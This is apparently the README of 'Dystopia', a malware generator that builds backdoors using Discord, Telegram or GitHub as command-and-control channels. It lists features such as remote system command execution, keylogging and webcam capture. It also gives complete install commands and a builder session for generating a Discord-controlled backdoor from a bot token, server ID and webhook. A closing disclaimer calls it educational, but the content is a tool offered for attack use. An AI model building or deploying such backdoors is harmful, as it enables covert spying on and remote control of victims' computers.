Dystopia is a malware generator that generates backdoors which use online platforms as C2s. This includes Discord, Telegram and Github.
Our goal is to prove that anything can be a C2, if you want to :) ...
The Dystopia backdoors are using libraries which allow the backdoor to act as a "Bot" for the above-mentioned platforms. Essentially the attacker contacts the bot and specifies a malicious command to execute on the target "Agent".
Dystopia is equipped with a lot of features some of which are:
- Encrypted traffic (HTTPS)
- Running system commands on target Agent
- Keylogger (Limited to Discord)
- Grabbing webcam snaps
- Multiple online agents at a time (Limited to Discord & GitHub)
Dystopia is better installed and used on Kali Linux:
git clone https://github.com/3ct0s/Dystopia-c2
cd ./Dystopia-c2
chmod +x setup.sh
./setup.sh
Once this is done we can use the builder. Let's build a discord based C2 backdoor:
python builder.py
use discord
set name <backdoor-name>
set guild-id <server id from discord>
set bot-token <discord bot token>
set channel-id <channel id from discord server>
set webhook <discord webhook>
build
Since the setup process is very specific for each platform:
Please follow the setup guide to setup Dystopia.
Contributions are welcome to our GitHub repo! We value community involvement and appreciate all types of contributions, from bug reports to code. Join us in building something great and making a positive impact on the world. Get involved today!
This github repository is made for educational purposes only. The developer is not responsible for any misuse of this software. Do not use this software for illegal purposes.